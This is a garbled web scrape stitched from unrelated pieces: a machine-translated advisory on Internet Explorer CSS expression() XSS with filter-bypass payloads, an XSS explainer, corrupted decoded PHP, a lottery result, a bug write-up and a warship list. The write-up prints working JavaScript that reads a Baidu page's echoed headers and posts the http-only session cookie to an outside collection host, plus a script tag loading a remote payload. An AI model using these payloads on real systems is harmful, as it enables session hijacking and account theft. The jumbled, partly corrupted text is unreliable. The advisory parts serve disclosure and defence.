(可能不太准确我是用软件翻译的)
概要:
Internet Explorer(以下IE) 那么是"expression(算式)因为说",并且包括述所以能在JavaScript在样式座席里述する。但是因为这个expression这个的?的検出范囲广阔所以JavaScript被在超过Web应用程序开発者的估计的范囲执行,并且,在IE,有成为XSS的事的原因。为此,Web应用程序开発者必须密切注意检查样式席。
确认被玩了的版本:
Internet Explorer 6
Internet Explorer 7 RC1
详细:
在IE,能让因为用如下样式述する所以在JavaScript做收成。
1) 在style块中的定?
styleinput { left:expression( alert('xss') ) } /style
2) 在界内系统的样式定?
div style="{ left:expression( alert('xss') ) }"
3) 评语的插入
div style="{ left:exp/* */ression( alert('xss') ) }"
4) 在反斜线的电码点数指定
div style="{ left:/0065/0078pression( alert('xss') ) }"
5) 本质参照
在界内系统的样式定能那么利用本质参照。
div style="{ left:expression( alert('xss') ) }"
6) 全角文字
div style="{ left:expression( alert('xss') ) }"
7) 特定的Unicode文字
div style="{ left:expRessioN( alert('xss') ) }"
至于R,U+0280,N能利用U+0274或者U+207F。
上边||1)? ? 7) 让は互相看,表面能做。
另外,||6) 叫7) 在は,IE7 RC1,不做收成。
被假定,并且是威:
攻击者自己在Web邮件以及样式席的指定可能的blog决定插入好象作为上?的样式,并且钻过想要查出"expression"的XSS防御的过滤器,并且变得能脱落。
経:
本案不是直接IE的脆弱性,但是在XSS因する的安全上边的||和点数判断,并且仁慈根据安全早期小心地合股指导,并且在通过IPA作为开発者的微软拿??了,并且得到了以下的评语。
--
确在弊社开発部做了||果,本现象||在点数的Internet Explorer的式样上边的||是收成,并且当不正确的时候被脆弱判断了。
为此,必要有??被收成书在Web网站上发生,并且〓エヒ,アリメェモミ??アサハユウノハ鰆レ」ラ」萤篑蒦セノマキ「ノ〓イ「ヌメ紊乱リ在合进行在网站?的过虑。
--
制品开発者が脆弱性ではないと明言していること、実际にこのデザインを原因とするXSSが存在するWebアプリケーションを复数确认したこと、「适切なフィルタリング」のためにはWebアプリケーション开発者への広い通知が必要なことから、本问题を公开するべきだと判断しました。
们所说跨站脚本是指在远程WEB页面的html代码中插入的具有恶意目的的数据,用户认为该
页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行,
有时候跨站脚本被称为"XSS",这是因为"CSS"一般被称为分层样式表,这很容易让人困惑,
如果
你听某人提到CSS或者XSS安全漏洞,通常指得是跨站脚本。
XSS和脚本注射的区别?
原文里作者是和他一个朋友(b0iler)讨论后,才明白并非任何可利用脚本插入实现攻击的
漏洞都被称为XSS,还有另一种攻击方式:"Script Injection",他们的区别在以下两点:
1.(Script Injection)脚本插入攻击会把我们插入的脚本保存在被修改的远程WEB页面里,如
:sql injection,XPath injection.
2.跨站脚本是临时的,执行后就消失了
什么类型的脚本可以被插入远程页面?
主流脚本包括以下几种:
HTML
JavaScript (本文讨论)
VBScript
ActiveX
Flash
base64解码如下,不过其中好像还夹杂了别的编码,或者你给的代码不全。
?php
if ( $_QTTɔєTԔԒu҂4ݝܹ͌}ERVER['SERVER_PSQI҂'73r涢"ЧРWBɉȁame.")ÂCBY
ԑTU%tEEUI}T'_OHCBÂY^]
}
require("../config.php"*ÂXݚ[ۖ֒҇VuWƖ6R"撗흫/i","",$_GET['action']*ÂY
[^J7F酵ɉ䠉͑ь͑эՍȈ͑эs"))#BÂ\ٜܚ[ؘۗXڙWۚ[Z]\pЧАFVf撂%E
A4Ѐ
define("CӕUI}9E","admin")Â\]Z\JPђTދЦFVf撂%E¢ŵuuD"⢷FV׆ƗFW2"촩efine("Z_TPL","admin"*ÂY[JђTՔՔ
pЧWVRD"⢷2֗熇"4)h詥}ɐAA}%H
Zyiis:ݘ\
ӥ'Vₜ4(4(
福利彩票双色球2016044期于4月19日开奖,开奖号码如下:红球:01 03 10 12 18 30 蓝球:01。
该测试页返回了完整的http头,其中也包括了完整的cookie。混贴吧圈的应该都知道BDUSS是最关键的字段,同时该字段是受http-only保护的,百度SRC之前也因此下调了XSS的评分标准。
02.jpg
这样,我们只要利用XSS平台的"指定页面源码读取"模块即可通过XSS获取用户的完整cookie。该模块代码如下:
code 区域
var u = 'http://buv.me/index.php?do=apiid={projectId}';
var cr;
if (document.charset) {
cr = document.charset
} else if (document.characterSet) {
cr = document.characterSet
};
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest()
} else {
var MSXML = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for (var n = 0; n MSXML.length; n++) {
try {
xmlHttp = new ActiveXObject(MSXML[n]);
break
} catch(e) {}
}
}
}
createXmlHttp();
xmlHttp.onreadystatechange = writeSource;
xmlHttp.open("GET", "http://appstest.baidu.com/http/echoheader.php", true);
xmlHttp.send(null);
function postSource(cc) {
createXmlHttp();
url = u;
cc = "mycode=" + cc;
xmlHttp.open("POST", url, true);
xmlHttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlHttp.setRequestHeader("Content-length", cc.length);
xmlHttp.setRequestHeader("Connection", "close");
xmlHttp.send(cc)
}
function writeSource() {
if (xmlHttp.readyState == 4) {
var c = new postSource(xmlHttp.responseText)
}
}
由于是用xmlHttpRequest的形式读源码,且 http://appstest.baidu.com/ 的 Access-Control-Allow-Origin 为空,即默认不允许跨域,所以我们必须在同域下才能用xmlHttpRequest获取到完整的cookie。
我在 http://wooyun.org/bugs/wooyun-2014-051026/trace/e80c9b4ecb9c252d6bdfdb21c335164d 中有提到, http://appstest.baidu.com/abnormalTest/abnormaTest.php?typeName=single 可以自由构造XSS。我们向该页面写入如下代码:
code 区域
titlewooyun.org/title
p超威蓝猫@wooyun.org/p
script src=http://00f.me/XbSWCk/script
衣阿华级4艘
南达科他级 阿拉巴马 马赛诸赛
北卡罗来纳级 北卡罗来纳
德克萨斯级 德克萨斯
-------------空母-----------
埃塞克斯级空母 无畏,约克城 大黄蜂 列克星敦
中途岛级 中途岛
―――――――重巡―――――
デ・モイン级重巡洋舰 CA-139 Salem
ガルヴェストン级ミサイル巡洋舰CLG-4 Little Rock(原克利夫兰级)
-------------潜水舰-----------------
バットフィッシュ、SS / AGSS-310
ベクーナ、SS / AGSS-319
ボーフィン、SS / AGSS-287 対马丸撃沈で有名
カヴァラ、SS / SSK / AGSS-244 空母翔鹤を撃沈
コビア、SS / AGSS-245
コッド、SS / AGSS / IXSS-224
クローカー、SS / SSK / AGSS / IXSS-246
USSドラム、SS-228 8万t撃沈
リング、SS / AGSS / IXSS-297
ライオンフィッシュ / AGSS-298
パンパニト、SS-383
----------驱逐舰----------------
Fletcher-class
DD-537 USS The Sullivans
DD-661 USS Kidd
DD-793 USS Cassin Young
Allen M. Sumner-class
DD-724 USS Laffey
Gearing-class 戦後なんだけど、一応书いておく
DD-830 USS Everett F. Larson SK全北
DD-837 USS Sarsfield TW徳阳
DD-850 USS Joseph P. Kennedy Jr.
DD-876 USS Rogers SK全州
我来说两句